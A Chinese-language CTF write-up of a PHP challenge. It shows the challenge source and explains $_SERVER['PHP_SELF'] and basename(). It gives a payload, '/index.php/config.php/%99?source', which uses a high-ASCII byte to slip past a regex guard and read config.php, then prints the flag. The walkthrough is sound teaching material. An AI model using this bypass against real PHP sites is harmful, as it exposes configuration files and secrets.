访问页面,点source
看源码;
<?php
include 'config.php'; // FLAG is defined in config.php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if (hash_equals($secret, $guess)) {
$message = 'Congratulations! The flag is: ' . FLAG;
} else {
$message = 'Wrong.';
}
}
?>
首先知道flag
在config.php
中,但是接下来的条件语句做了正则匹配;
$_SERVER['PHP_SELF']
返回当前执行的脚本名称,例如:
http://k1ose2jo.com/index.php/example.php
$_SERVER['PHP_SELF']
会返回/index.php/example.php
接下来是basename()
这个函数;
basename
会返回路径文件中的文件名;
如,basename($_SERVER['PHP_SELF'])
会返回example.php
;
这样,想要输出config.php的内容,还需要通过/config.php?source
,需要绕过正则;
直接上128-255的ASCII值来污染;
/index.php/config.php/%99?source
拿到flag;
flag{50a4d60e-9823-42d9-b513-dec749a7ee94}